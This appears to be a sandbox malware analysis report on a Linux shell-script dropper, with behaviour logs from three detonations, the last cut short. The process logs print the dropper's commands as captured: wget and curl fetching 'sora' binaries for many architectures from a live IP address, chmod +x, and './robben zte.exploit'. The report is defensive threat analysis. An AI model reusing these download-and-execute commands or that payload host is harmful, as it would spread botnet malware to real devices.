Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-dlfg8awfmj
Target f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
SHA256 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70

Threat Level: Shows suspicious behavior

The file f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

Executes dropped EXE

File and Directory Permissions Modification

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 03:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 03:05

Reported

2024-10-18 03:08

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

1s

Max time network

128s

Command Line

[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh N/A

Processes

/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh

[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x config-err-6aBU03 f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh netplan_cmehilj5 robben snap-private-tmp ssh-de3qHQhlbyqj systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-bolt.service-dn03Ev systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-colord.service-Daea1A systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-ModemManager.service-1b7tlV systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-resolved.service-NWZFv9 systemd-private-c846bed9a2c44cbf931c5d3f29afcb4c-systemd-timedated.service-GwjbF2]

/tmp/robben

[./robben zte.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
N/A 224.0.0.251:5353 udp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
US 151.101.1.91:443 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
GB 89.187.167.9:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 03:05

Reported

2024-10-18 03:08

Platform

debian9-armhf-20240418-en

Max time kernel

11s

Max time network

12s

Command Line

[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh N/A

Processes

/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh

[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-dcf9354662c842c3a6d7beac91b0a8e3-systemd-timedated.service-FUas2M]

/tmp/robben

[./robben zte.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

memory/783-1-0xb677d000-0xb678e044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-18 03:05

Reported

2024-10-18 03:08

Platform

debian9-mipsbe-20240418-en

Max time kernel

27s

Max time network

25s

Command Line

[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
